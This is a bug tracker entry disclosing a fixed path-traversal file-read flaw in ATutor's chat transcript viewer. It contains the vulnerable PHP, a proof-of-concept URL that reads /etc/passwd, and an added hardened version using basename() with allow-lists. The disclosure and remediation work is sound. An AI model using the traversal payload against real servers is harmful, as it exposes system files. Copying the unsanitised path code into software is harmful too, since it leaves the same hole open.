MantisBT

View Issue Details

ID: 0005657
Project: ATutor
Category: atutor.ca
View Status: public
Date Submitted: 2016-03-19 11:59
Last Update: 2016-06-30 17:43
Reporter: mr_me
Assigned To: mr_me
Priority: high
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Platform: Unix
OS:
OS Version:
Product Version: 2.2.1
Target Version: 2.2.1
Fixed in Version: 2.2.1
Summary: 0005657: Arbitrary file read in mods/_standard/chat/manage/view_transcript.php
Description: Again, auth not required... it can be bypassed

// $_GET['t'] is concatenated into the path unmodified, so "../" sequences escape the transcript directory
$file = AT_CONTENT_DIR . 'chat/'.$_SESSION['course_id'].'/tran/'.$_GET['t'].'.html';
if (!file_exists($file)) {
        $msg->addError('FILE_NOT_FOUND');
        header('Location: index.php');
        exit;
}
require(AT_INCLUDE_PATH.'header.inc.php');
@readfile($file); // the attacker-controlled path is read straight back to the client

PoC:
http://172.16.175.152/ATutor/mods/_standard/chat/manage/view_transcript.php?t=../../../../../../../../../etc/passwd%00&h=

Tags: No tags attached.
Affects version: SVN
SVN Revision#: 5da4de65b9eb141bd75d8fd6a7b1b863e0369e6d
Attached Files:

- Relationships

- Notes
(0007362)
mr_me (developer)
2016-03-21 10:09

patch: https://github.com/atutor/ATutor/pull/116
(0007369)
greg (administrator)
2016-03-23 20:05

added basename() to prevent arbitrary file reading
(0007457)
greg (administrator)
2016-06-30 17:43

Close for 2.2.2
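
The following is an added example and is not ATutor's code or the patch from pull request 116: it puts the vulnerable path construction from view_transcript.php next to a hardened version that applies the basename() fix described in note 0007369, and runs the PoC value of t from this report through both. The CONTENT_DIR constant stands in for AT_CONTENT_DIR (its value is assumed), and the allow-list formats for the course id and the transcript name are this example's own assumptions, not something the report or the patch specifies.

```php
<?php
// Added example, not ATutor code: the vulnerable path construction from
// view_transcript.php beside a hardened version, with a self-check that runs
// the PoC parameter from this report through both.
// CONTENT_DIR stands in for AT_CONTENT_DIR; the value is assumed.
const CONTENT_DIR = '/var/www/ATutor/content/';

// Vulnerable: $t is spliced into the path unchanged. "../" walks out of the
// transcript directory, and on PHP older than 5.3.4 a trailing NUL (%00)
// truncated the path so the ".html" suffix never applied.
function transcript_path_vulnerable(string $courseId, string $t): string
{
    return CONTENT_DIR . 'chat/' . $courseId . '/tran/' . $t . '.html';
}

// Hardened: basename() drops every directory component, which is what the
// patch adds. The allow-lists on top are this example's own additions
// (assumed formats: numeric course id, transcript names made of letters,
// digits, '-' and '_'); they also reject NUL bytes and "..".
// Returns null for any input that is not acceptable.
function transcript_path_hardened(string $courseId, string $t): ?string
{
    if (!preg_match('/^[0-9]+$/', $courseId)) {
        return null;
    }
    $name = basename($t);
    if ($name === '' || !preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }
    return CONTENT_DIR . 'chat/' . $courseId . '/tran/' . $name . '.html';
}

// Defence in depth when a strict allow-list is not possible: resolve the path
// and confirm it still sits under the expected directory. realpath() returns
// false for a path that does not exist, which counts as "not allowed".
function path_within(string $path, string $baseDir): bool
{
    $real = realpath($path);
    $realBase = realpath($baseDir);
    if ($real === false || $realBase === false) {
        return false;
    }
    $prefix = rtrim($realBase, '/') . '/';
    return strncmp($real, $prefix, strlen($prefix)) === 0;
}

// Self-check (constructed inputs): the PoC value of t from this report and a
// well-formed transcript name.
$poc = "../../../../../../../../../etc/passwd\0";
$good = 'transcript_2016-03-19';

echo "vulnerable : ", str_replace("\0", '%00', transcript_path_vulnerable('1', $poc)), "\n";
echo "hardened   : ", var_export(transcript_path_hardened('1', $poc), true), "\n";
echo "hardened ok: ", var_export(transcript_path_hardened('1', $good), true), "\n";

// Containment check against a real directory created for this run.
$dir = sys_get_temp_dir() . '/tran_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/ok.html', 'sample transcript');
echo "inside     : ", var_export(path_within($dir . '/ok.html', $dir), true), "\n";
echo "traversal  : ", var_export(path_within($dir . '/../../etc/passwd', $dir), true), "\n";
unlink($dir . '/ok.html');
rmdir($dir);
```

Two caveats worth keeping in mind when testing this class of bug. First, on PHP 5.3.4 and later the filesystem functions refuse paths containing a NUL byte (file_exists() returns false; PHP 8 throws a ValueError), so the %00 part of the PoC only works on older interpreters; plain "../" traversal still reads any file ending in .html that the web server user can open, such as another course's transcripts, so the basename() fix is needed regardless. Second, basename() on its own only strips directory components; the allow-list regex is what rejects a NUL byte or other junk that survives inside the final name, and the realpath() check catches the case where a symlink inside the transcript directory points elsewhere.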

- Issue History
Date Modified Username Field Change
2016-03-19 11:59 mr_me New Issue
2016-03-19 11:59 mr_me Status new => assigned
2016-03-19 11:59 mr_me Assigned To => greg
2016-03-21 10:09 mr_me Note Added: 0007362
2016-03-23 20:05 greg SVN Revision# => 5da4de65b9eb141bd75d8fd6a7b1b863e0369e6d
2016-03-23 20:05 greg Note Added: 0007369
2016-03-23 20:05 greg Status assigned => resolved
2016-03-23 20:05 greg Fixed in Version => 2.2.1
2016-03-23 20:05 greg Resolution open => fixed
2016-03-23 20:05 greg Assigned To greg => mr_me
2016-06-30 17:43 greg Note Added: 0007457
2016-06-30 17:43 greg Status resolved => closed


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker